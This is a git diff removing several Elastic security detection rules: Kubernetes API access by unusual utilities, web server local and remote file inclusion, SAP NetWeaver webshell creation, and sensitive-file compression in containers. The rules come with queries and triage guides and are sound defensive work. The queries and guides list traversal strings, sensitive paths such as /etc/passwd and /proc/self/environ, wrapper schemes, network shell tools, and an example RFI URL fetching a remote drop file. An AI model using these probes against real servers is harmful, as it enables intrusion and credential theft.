-index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"]
-interval = "5m"
-language = "eql"
-license = "Elastic License v2"
-name = "Direct Interactive Kubernetes API Request by Unusual Utilities"
-note = """ ## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Direct Interactive Kubernetes API Request by Unusual Utilities
-
-This rule detects interactive commands executed inside containers that use atypical utilities to hit the Kubernetes API, paired with near-simultaneous API activity on pods, secrets, service accounts, roles/bindings, or pod exec/attach/log/portforward. It surfaces hands-on-keyboard discovery and lateral movement using custom scripts that evade common tool allowlists; for example, an intruder opens a shell in a pod, uses Python to query the in-cluster API to list secrets, then triggers pods/exec to pivot into another workload.
-
-### Possible investigation steps
-
-- Identify the implicated pod, container image, and executing service account, then quickly review its RBAC bindings and effective permissions to determine blast radius.
-- Inspect the container’s interactive session context by pulling recent command lines, shell history, environment variables, and mounted service account tokens, and look for custom scripts or binaries issuing HTTP requests.
-- Correlate nearby Kubernetes audit entries tied to the same principal and pod to map accessed resources and verbs, noting any exec/attach/portforward or sensitive object interactions across namespaces.
-- Review network activity from the pod to the API server and any in-pod proxies, including DNS lookups and outbound connections, to spot nonstandard clients or tunneling behavior.
-- If suspicious, isolate the pod or node, capture runtime artifacts (e.g., process memory or HTTP client traffic), revoke and rotate the service account credentials, and verify image provenance and integrity.
-
-### False positive analysis
-
-- An operator interactively attaches to a pod and uses a Python REPL or bash with /dev/tcp to call the in-cluster API for routine troubleshooting (e.g., list pods, read ConfigMaps, or run selfsubjectaccessreviews), producing normal audit entries that match the rule signature.
-- A correlation artifact arises when two namespaces have pods with the same name: one pod starts an interactive shell while another independently performs get/list/watch calls, and the 1-second sequence keyed only on pod-name links the unrelated events.
-
-### Response and remediation
-
-- Immediately isolate the implicated pod that issued direct API calls using a nonstandard utility by applying a deny-all egress NetworkPolicy in its namespace (including to kubernetes.default.svc:443), terminating the interactive session, and scaling its owning Deployment/Job/StatefulSet to zero replicas.
-- Before teardown, capture a runtime snapshot of the container and node including the binary or script used to query the API (e.g., files under /tmp or /dev/tcp usage), shell history, environment, and the mounted service account token and CA bundle at /var/run/secrets/kubernetes.io/serviceaccount/.
-- Revoke access by removing the service account’s RoleBindings/ClusterRoleBindings, deleting all pods that mount that service account to force token rotation, rotating any Secrets and ConfigMaps that were read or created during the window, and deleting any unauthorized Jobs, CronJobs, or Deployments created by the same principal.
-- Restore workloads from a known-good image digest, re-enable the Deployment only after image scan and integrity checks pass, and monitor subsequent Kubernetes audit logs for pods/exec, portforward, and access to secrets across the affected namespaces.
-- Escalate to incident response leadership and consider cluster-wide containment if audit logs show create/patch of ClusterRoleBindings, access to secrets outside the workload’s namespace, or use of pods/exec to pivot into other nodes or system namespaces such as kube-system.
-- Harden access by enforcing least-privilege RBAC that denies pods/exec and attach for application service accounts, setting automountServiceAccountToken: false on workloads that do not need it, restricting egress to the API server with NetworkPolicies, and requiring just-in-time break-glass roles for interactive access.
-"""
-risk_score = 21
-rule_id = "02275e05-57a1-46ab-a443-7fb444da6b28"
-severity = "low"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Data Source: Kubernetes",
- "Domain: Container",
- "Domain: Kubernetes",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Tactic: Discovery",
- "Resources: Investigation Guide",
-]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-sequence with maxspan=1s
- [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.interactive == true and
- container.id like "*" and
- /* Covered by the rule "Direct Interactive Kubernetes API Request by Common Utilities" */
- not (
- process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or
- (
- /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */
- process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and
- process.args in (
- "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget",
- "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client",
- "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl",
- "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl",
- "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat",
- "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat",
- "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl"
- ) and
- /* default exclusion list to not FP on default multi-process commands */
- not process.args in (
- "which", "/bin/which", "/usr/bin/which",
"/usr/local/bin/which",
- "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man",
- "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod",
- "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown"
- )
- ) or
- /* General exclusions for utilities that are not typically used for Kubernetes API requests */
- process.name in (
- "sleep", "head", "tail", "apk", "apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf",
- "pacman", "rpm", "dpkg"
- )
- )] by orchestrator.resource.name
- [any where
- event.dataset == "kubernetes.audit_logs" and
- kubernetes.audit.stage in ("ResponseStarted","ResponseComplete") and
- kubernetes.audit.verb in ("get", "list", "watch", "create", "patch", "update") and
- (
- kubernetes.audit.objectRef.resource in (
- "pods", "secrets", "serviceaccounts", "configmaps",
- "roles", "rolebindings", "clusterroles", "clusterrolebindings",
- "deployments", "daemonsets", "statefulsets", "jobs", "cronjobs",
- "nodes", "namespaces",
- "selfsubjectaccessreviews", "selfsubjectrulesreviews", "subjectaccessreviews"
- )
- or (
- kubernetes.audit.objectRef.resource == "pods" and
- kubernetes.audit.objectRef.subresource in ("exec", "attach", "portforward", "log")
- )
- )
- ] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name`
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1069"
-name = "Permission Groups Discovery"
-reference = "https://attack.mitre.org/techniques/T1069/"
-
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1609"
-name = "Container Administration Command"
-reference = "https://attack.mitre.org/techniques/T1609/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml
deleted file mode 100644
index 2cca4c558fb..00000000000
--- a/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml
+++ /dev/null
@@ -1,177 +0,0 @@
-[metadata]
-creation_date = "2025/12/02"
-integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
-maturity = "production"
-min_stack_version = "9.2.0"
-min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule detects potential Local File Inclusion (LFI) activity on web servers by identifying HTTP GET requests that
-attempt to access sensitive local files through directory traversal techniques or known file paths. Attackers may
-exploit LFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
-"""
-from = "now-11m"
-interval = "10m"
-language = "esql"
-license = "Elastic License v2"
-name = "Web Server Local File Inclusion Activity"
-note = """ ## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Web Server Local File Inclusion Activity
-
-This rule surfaces successful GET requests containing directory traversal or direct access to sensitive paths, signaling Local File Inclusion exploitation that can expose credentials, configuration, and process context and enable further compromise. A common attacker pattern is abusing a vulnerable parameter to fetch ../../../../etc/passwd, then pivoting to /proc/self/environ to harvest secrets and identify execution context for subsequent steps.
-
-### Possible investigation steps
-
-- Retrieve contiguous access logs around the alert to rebuild each request/response pair (URI, parameters, user agent, referer, cookies, X-Forwarded-For) and identify which parameter reflected traversal or wrapper usage and whether the response likely contained file contents.
-- Compare response sizes and content-types for the suspicious requests to normal pages and look for signatures such as "root:x:" lines, INI/XML keys, or base64 blobs that indicate disclosure of /etc/passwd, web.config/applicationhost.config, or other sensitive files.
-- Review web server and application error logs at the same timestamps for include/open stream warnings, open_basedir or allow_url_fopen messages, and stack traces to confirm the code path handling the input and any mitigations in place.
-- Pivot on the same source and timeframe to find adjacent probes (php://filter, data://, expect://, zip://, phar://, /proc/self/environ, traversal into webroots/configs) and any follow-on POSTs to upload endpoints or new script paths, signaling progression toward RCE or webshell placement.
-- Determine whether the traffic was authenticated and whether it traversed a WAF or reverse proxy by correlating cookies or session IDs and client IPs with proxy/WAF logs, noting any blocks, rule matches, or bypasses to bound scope and urgency.
-
-### False positive analysis
-
-- A site search or documentation endpoint echoing user-supplied text can include strings like ../../../../etc/passwd, windows/win.ini, or php://filter in the query string and return a normal 200 OK results page rather than performing a file include.
-- An authenticated admin feature (such as a log viewer or file browser) may legitimately accept path= or file= parameters referencing local paths like /var/log/nginx or /inetpub/logs/logfiles and return 200 when serving allowed files, producing URLs that match the rule without exploitation.
-
-### Response and remediation
-
-- Immediately block the source IP at the reverse proxy/WAF and deploy deny rules for GET requests using ../../ or ..\\..\\ traversal or wrappers (php://, expect://, data://) that fetch /etc/passwd, /proc/self/environ, wp-config.php, web.config, or applicationhost.config.
-- Configure the web server to return 403 for paths resolving to /proc, /etc, /var/log, /inetpub, applicationhost.config, and web.config and to reject wrapper schemes like php:// and expect://, then reload Nginx/Apache/IIS to apply.
-- Fix the vulnerable include logic by canonicalizing input with realpath, rejecting any .. segments or absolute paths, enforcing a whitelist of allowed files, and in PHP disabling allow_url_include/allow_url_fopen and setting open_basedir to a safe directory.
-- Rotate exposed secrets by changing database and API credentials from wp-config.php, connection strings and machine keys from web.config/applicationhost.config, and any tokens in /proc/self/environ, then invalidate active sessions and cache.
-- Escalate to incident leadership and quarantine the host if response bodies contain credential patterns (e.g., "root:x:" from /etc/passwd or XML keys from web.config), if /etc/shadow or windows/system32/config/SAM was requested, or if follow-on POSTs or new .php/.aspx files appear in the webroot.
-- Recover by verifying integrity of /var/www and /inetpub/wwwroot, scanning for webshells and unexpected includes, redeploying a known-good build or container image if tampering is found, and adding WAF normalization to double-decode URLs and 403 traversal attempts.
-"""
-risk_score = 21
-rule_id = "90e4ceab-79a5-4f8e-879b-513cac7fcad9"
-severity = "low"
-tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "esql"
-query = '''
-from
- logs-nginx.access-*,
- logs-apache.access-*,
- logs-apache_tomcat.access-*,
- logs-iis.access-*,
- logs-traefik.access-*
-| where
- http.request.method == "GET" and
- http.response.status_code == 200 and
- url.original like "*=*"
-
-| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original))
-
-| where
- /* 1) Relative traversal */
- Esql.url_original_url_decoded_to_lower like "*../../../../*" or // Unix-style traversal
- Esql.url_original_url_decoded_to_lower like "*..\\\\..\\\\..\\\\..*" or // Windows-style traversal
- // Potential security check bypassing (enforcing multiple dots and shortening the pattern)
- Esql.url_original_url_decoded_to_lower like "*..././*" or
- Esql.url_original_url_decoded_to_lower like "*...\\*" or
- Esql.url_original_url_decoded_to_lower like "*....\\*" or
-
- /* 2) Linux system identity / basic info */
- Esql.url_original_url_decoded_to_lower like "*etc/passwd*" or
- Esql.url_original_url_decoded_to_lower like "*etc/shadow*" or
- Esql.url_original_url_decoded_to_lower like "*etc/hosts*" or
- Esql.url_original_url_decoded_to_lower like "*etc/os-release*" or
- Esql.url_original_url_decoded_to_lower like "*etc/issue*" or
-
- /* 3) Linux /proc enumeration */
- Esql.url_original_url_decoded_to_lower like "*proc/self/environ*" or
- Esql.url_original_url_decoded_to_lower like "*proc/self/cmdline*" or
- Esql.url_original_url_decoded_to_lower like "*proc/self/fd*" or
- Esql.url_original_url_decoded_to_lower like "*proc/self/exe*" or
-
- /* 4) Linux webroots, configs & logs */
-
Esql.url_original_url_decoded_to_lower like "*var/www*" or // generic webroot
- Esql.url_original_url_decoded_to_lower like "*wp-config.php*" or // classic WP config
- Esql.url_original_url_decoded_to_lower like "*etc/apache2*" or
- Esql.url_original_url_decoded_to_lower like "*etc/httpd*" or
- Esql.url_original_url_decoded_to_lower like "*etc/nginx*" or
- Esql.url_original_url_decoded_to_lower like "*var/log/apache2*" or
- Esql.url_original_url_decoded_to_lower like "*var/log/httpd*" or
- Esql.url_original_url_decoded_to_lower like "*var/log/nginx*" or
-
- /* 5) Windows core files / identity */
- Esql.url_original_url_decoded_to_lower like "*windows/panther/*unattend*" or
- Esql.url_original_url_decoded_to_lower like "*windows/debug/netsetup.log*" or
- Esql.url_original_url_decoded_to_lower like "*windows/win.ini*" or
- Esql.url_original_url_decoded_to_lower like "*windows/system32/drivers/etc/hosts*" or
- Esql.url_original_url_decoded_to_lower like "*boot.ini*" or
- Esql.url_original_url_decoded_to_lower like "*windows/system32/config/*" or
- Esql.url_original_url_decoded_to_lower like "*windows/repair/sam*" or
- Esql.url_original_url_decoded_to_lower like "*windows/system32/license.rtf*" or
-
- /* 6) Windows IIS / .NET configs, webroots & logs */
- Esql.url_original_url_decoded_to_lower like "*/inetpub/wwwroot*" or
- Esql.url_original_url_decoded_to_lower like "*/inetpub/logs/logfiles*" or
- Esql.url_original_url_decoded_to_lower like "*applicationhost.config*" or
- Esql.url_original_url_decoded_to_lower like "*/microsoft.net/framework64/*/config/web.config*" or
- Esql.url_original_url_decoded_to_lower like "*windows/system32/inetsrv/*" or
-
- /* 7) PHP & protocol wrappers */
- Esql.url_original_url_decoded_to_lower like "*php://*" or
- Esql.url_original_url_decoded_to_lower like "*zip://*" or
- Esql.url_original_url_decoded_to_lower like "*phar://*" or
- Esql.url_original_url_decoded_to_lower like "*expect://*" or
- Esql.url_original_url_decoded_to_lower like
"*file://*" or
- Esql.url_original_url_decoded_to_lower like "*data://text/plain;base64*"
-
-| keep
- @timestamp,
- Esql.url_original_url_decoded_to_lower,
- source.ip,
- agent.id,
- agent.name,
- http.request.method,
- http.response.status_code,
- event.dataset,
- data_stream.namespace
-
-| stats
- Esql.event_count = count(),
- Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower),
- Esql.agent_name_values = values(agent.name),
- Esql.agent_id_values = values(agent.id),
- Esql.http_request_method_values = values(http.request.method),
- Esql.http_response_status_code_values = values(http.response.status_code),
- Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower),
- Esql.event_dataset_values = values(event.dataset),
- Esql.data_stream_namespace_values = values(data_stream.namespace)
- by source.ip
-'''
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1005"
-name = "Data from Local System"
-reference = "https://attack.mitre.org/techniques/T1005/"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml
deleted file mode 100644
index 4db561f9f8f..00000000000
--- a/rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml
+++ /dev/null
@@ -1,116 +0,0 @@
-[metadata]
-creation_date = "2025/12/02"
-integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
-maturity = "production"
-min_stack_version = "9.2.0"
-min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-This rule detects potential Remote File Inclusion (RFI) activity on web servers by identifying HTTP GET requests that
-attempt to access sensitive remote files through directory traversal techniques or known file paths. Attackers may
-exploit RFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
-"""
-from = "now-11m"
-interval = "10m"
-language = "esql"
-license = "Elastic License v2"
-name = "Web Server Potential Remote File Inclusion Activity"
-note = """## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Web Server Potential Remote File Inclusion Activity
-
-This rule identifies successful GET requests that pass a remote URL or raw IP in a parameter, signaling Remote File Inclusion attempts that coerce the app to fetch external content or reveal local files. RFI matters because it enables discovery, leaks sensitive data, and can bootstrap code retrieval for persistence or command-and-control. Example behavior: probing an include endpoint with /index.php?page=http://203.0.113.10/drop.txt to verify remote fetch and execution via a vulnerable loader.
-
-### Possible investigation steps
-
-- Decode the full request URL and parameters, identify the endpoint and parameter names, and confirm with application owners whether passing remote URLs is expected behavior for that route.
-- Correlate the event time with outbound connections from the web server to the referenced domain or IP using egress firewall, proxy, DNS, or NetFlow logs to verify whether a fetch occurred.
-- Review adjacent web access entries from the same source IP and user agent to detect scanning behavior, varied include parameters, wrapper strings (php://, data://, file://), or local file probes that indicate exploitation attempts.
-- Check the referenced remote domain or IP with threat intelligence, and if needed, safely retrieve it in an isolated environment to examine content, redirects, and headers for droppers or callbacks.
-- Look for post-inclusion artifacts by checking webroot and temp directories for newly created or modified files, suspicious script writes, and unusual access patterns, and inspect server or application configuration for risky URL include settings.
-
-### False positive analysis
-
-- Applications that legitimately accept full URLs in query parameters for link previews, content proxies, image fetching, or feed importers (e.g., url= or src=) will return 200 and match *=http(s)://*, appearing as RFI despite expected behavior.
-- Administrative or diagnostic endpoints that allow users to supply IP addresses or URI schemes (ftp://, smb://, file://) to test connectivity or preview resources (e.g., target=192.168.1.10) can return 200 and trigger this rule even though no inclusion vulnerability is present.
-
-### Response and remediation
-
-- Immediately block offending source IPs and request patterns at the WAF/reverse proxy (e.g., GETs where page=, url=, or src= contains http://, https://, ftp://, smb://, or file://) and temporarily disable the affected include/loader endpoints until fixed.
-- Restrict outbound connections from the web server to the domains and IPs referenced in the requests and quarantine the host if 200 OK responses align with remote downloads or wrapper usage such as php://, data://, file://.
-- Collect forensic images, then remove newly created or modified scripts in webroot and temp directories (e.g., /var/www, uploads, /tmp), delete unauthorized .htaccess/web.config entries, clear caches, and terminate suspicious processes running under the web server account.
-- Redeploy the application from a known-good build, restore clean configuration files, rotate credentials exposed by local file probes (e.g., config.php, .env), invalidate sessions, and verify functionality before returning the service to production.
-- Harden by disabling risky features and enforcing strict input controls: set PHP allow_url_include=Off and allow_url_fopen=Off, apply open_basedir restrictions, implement scheme/domain allowlists for any include/load functionality, and sanitize and normalize user-supplied parameters.
-- Escalate to incident response and preserve disk and memory images if remote content was fetched and executed, a webshell or unknown script is found in the webroot, or the same actor generates successful 200 RFI-style requests across multiple hosts.
-- Enhance monitoring for RFI attempts by tuning WAF rules to alert on suspicious include parameters, enabling detailed web server logging, and setting up alerts for anomalous outbound connections from web servers.
-"""
-risk_score = 21
-rule_id = "45d099b4-a12e-4913-951c-0129f73efb41"
-severity = "low"
-tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "esql"
-query = '''
-from
- logs-nginx.access-*,
- logs-apache.access-*,
- logs-apache_tomcat.access-*,
- logs-iis.access-*,
- logs-traefik.access-*
-| where
- http.request.method == "GET" and
- http.response.status_code == 200 and
- url.original like "*=*"
-
-| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original))
-
-| where
- Esql.url_original_url_decoded_to_lower like "*=http://*" or
- Esql.url_original_url_decoded_to_lower like "*=https://*" or
- Esql.url_original_url_decoded_to_lower like "*=ftp://*" or
- Esql.url_original_url_decoded_to_lower like "*=smb://*" or
- Esql.url_original_url_decoded_to_lower like "*=file://*" or
- Esql.url_original_url_decoded_to_lower rlike """.*=.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}.*"""
-
-| keep
- @timestamp,
- Esql.url_original_url_decoded_to_lower,
- source.ip,
- agent.id,
- agent.name,
- http.request.method,
- http.response.status_code,
- event.dataset,
- data_stream.namespace
-
-| stats
- Esql.event_count = count(),
- Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower),
- Esql.agent_name_values = values(agent.name),
- Esql.agent_id_values = values(agent.id),
- Esql.http_request_method_values = values(http.request.method),
- Esql.http_response_status_code_values = values(http.response.status_code),
- Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower),
- Esql.event_dataset_values = values(event.dataset),
- Esql.data_stream_namespace_values = values(data_stream.namespace)
- by source.ip
-'''
-
-[[rule.threat]]
-framework =
"MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1190"
-name = "Exploit Public-Facing Application"
-reference = "https://attack.mitre.org/techniques/T1190/"
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml
deleted file mode 100644
index 143cd14ba11..00000000000
--- a/rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml
+++ /dev/null
@@ -1,75 +0,0 @@
-[metadata]
-creation_date = "2025/04/26"
-integration = ["endpoint"]
-maturity = "production"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-Identifies suspicious Java file creation in the IRJ directory of the SAP NetWeaver application. This may indicate an attempt to deploy a webshell.
-"""
-from = "now-9m"
-index = ["auditbeat-*", "logs-endpoint.events.file*"]
-language = "eql"
-license = "Elastic License v2"
-name = "Potential SAP NetWeaver WebShell Creation"
-references = [
- "https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/",
- "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
-]
-risk_score = 73
-rule_id = "f7d588ba-e4b0-442e-879d-7ec39fbd69c5"
-severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
-timestamp_override = "event.ingested"
-type = "eql"
-
-query = '''
-file where host.os.type in ("linux", "windows") and event.action == "creation" and
- file.extension : ("jsp", "java", "class") and
- file.path : ("/*/sap.com/*/servlet_jsp/irj/root/*",
- "/*/sap.com/*/servlet_jsp/irj/work/*",
- "?:\\*\\sap.com\\*\\servlet_jsp\\irj\\root\\*",
- "?:\\*\\sap.com\\*\\servlet_jsp\\irj\\work\\*")
-'''
-note = """## Triage and analysis
-
-### Investigating Potential SAP NetWeaver WebShell Creation
-
-### Possible investigation steps
-
-- Examine the file creation event and the associated HTTP post request logs details to identify the source of the creation.
-- Examine the process tree to verify the parent-child relationship between the Java process and any suspicious child processes such as shell scripts or scripting languages (e.g., sh, bash, curl, python).
-- Check the command line arguments and environment variables of the suspicious child processes to identify any potentially malicious payloads or commands being executed.
-- Investigate the host's recent activity and logs for any other indicators of compromise or unusual behavior that might correlate with the suspected exploitation attempt.
-- Assess the system for any unauthorized changes or new files that may have been introduced as a result of the exploitation attempt, focusing on JSP files under the IRJ root directory.
-
-
-### Response and remediation
-
-- Immediately isolate the affected host from the network to prevent further outbound connections and potential lateral movement.
-- Terminate any suspicious Java processes identified in the alert, especially those making outbound connections to LDAP, RMI, or DNS ports.
-- Conduct a thorough review of the affected system for any unauthorized changes or additional malicious processes, focusing on child processes like shell scripts or scripting languages.
-- Restore the affected system from a known good backup if unauthorized changes or malware are detected.
-- Update and patch Java and any related applications to the latest versions to mitigate known vulnerabilities.
-- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to assess the potential impact on other systems within the network."""
-
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1505"
-name = "Server Software Component"
-reference = "https://attack.mitre.org/techniques/T1505/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1505.003"
-name = "Web Shell"
-reference = "https://attack.mitre.org/techniques/T1505/003/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml
deleted file mode 100644
index a2427964654..00000000000
--- a/rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml
+++ /dev/null
@@ -1,141 +0,0 @@
-[metadata]
-creation_date = "2023/05/12"
-integration = ["cloud_defend"]
-maturity = "production"
-min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
-min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
-
-[rule]
-author = ["Elastic"]
-description = """
-Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials
-and system configurations inside a container.
-"""
-from = "now-6m"
-index = ["logs-cloud_defend.process*"]
-interval = "5m"
-language = "eql"
-license = "Elastic License v2"
-name = "Sensitive File Compression Detected via Defend for Containers"
-note = """## Setup
-
-## Triage and analysis
-
-> **Disclaimer**:
-> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
-
-### Investigating Sensitive File Compression Detected via Defend for Containers
-
-Containers are lightweight, portable environments used to run applications consistently across different systems. Adversaries may exploit compression utilities within containers to gather and exfiltrate sensitive files, such as credentials and configuration files. The detection rule identifies suspicious compression activities by monitoring for specific utilities and file paths, flagging potential unauthorized data collection attempts.
-
-### Possible investigation steps
-
-- Review the process details to confirm the use of compression utilities such as zip, tar, gzip, hdiutil, or 7z within the container environment, focusing on the process.name and process.args fields.
-- Examine the specific file paths listed in the process.args to determine if they include sensitive files like SSH keys, AWS credentials, or Docker configurations, which could indicate unauthorized data collection.
-- Identify the container.id associated with the alert to gather more context about the container's purpose, owner, and any recent changes or deployments that might explain the activity.
-- Check the event.type field for "start" to verify the timing of the process initiation and correlate it with any known legitimate activities or scheduled tasks within the container.
-- Investigate the user or service account under which the process was executed to assess whether it has the necessary permissions and if the activity aligns with expected behavior for that account.
-- Look for any related alerts or logs that might indicate a broader pattern of suspicious activity within the same container or across other containers in the environment.
-
-### False positive analysis
-
-- Routine backup operations may trigger the rule if they involve compressing sensitive files for storage. To handle this, identify and exclude backup processes or scripts that are known and trusted.
-- Automated configuration management tools might compress configuration files as part of their normal operation. Exclude these tools by specifying their process names or paths in the exception list.
-- Developers or system administrators might compress sensitive files during legitimate troubleshooting or maintenance activities. Establish a process to log and review these activities, and exclude them if they are verified as non-threatening.
-- Continuous integration and deployment pipelines could involve compressing configuration files for deployment purposes. Identify these pipelines and exclude their associated processes to prevent false positives.
-- Security tools that perform regular audits or scans might compress files for analysis. 
Ensure these tools are recognized and excluded from triggering the rule.
-
-### Response and remediation
-
-- Immediately isolate the affected container to prevent further data exfiltration or unauthorized access. This can be done by stopping the container or disconnecting it from the network.
-- Conduct a thorough review of the compressed files and their contents to assess the extent of sensitive data exposure. Focus on the specific file paths identified in the alert.
-- Change credentials and keys that may have been compromised, including SSH keys, AWS credentials, and Docker configurations. Ensure that new credentials are distributed securely.
-- Review and update access controls and permissions for sensitive files within containers to minimize exposure. Ensure that only necessary processes and users have access to these files.
-- Implement monitoring and alerting for similar compression activities in other containers to detect potential threats early. Use the identified process names and arguments as indicators.
-- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been affected. 
-- Conduct a post-incident review to identify gaps in security controls and update container security policies to prevent recurrence."""
-risk_score = 47
-rule_id = "475b42f0-61fb-4ef0-8a85-597458bfb0a1"
-severity = "medium"
-tags = [
- "Data Source: Elastic Defend for Containers",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Collection",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
-]
-timestamp_override = "event.ingested"
-type = "eql"
-query = '''
-process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and (
- process.name in ("zip", "tar", "gzip", "hdiutil", "7z", "rar", "7zip", "p7zip") or
- (
- /* account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */
- process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and
- process.args in (
- "zip", "/bin/zip", "/usr/bin/zip", "/usr/local/bin/zip",
- "tar", "/bin/tar", "/usr/bin/tar", "/usr/local/bin/tar",
- "gzip", "/bin/gzip", "/usr/bin/gzip", "/usr/local/bin/gzip",
- "hdiutil", "/bin/hdiutil", "/usr/bin/hdiutil", "/usr/local/bin/hdiutil",
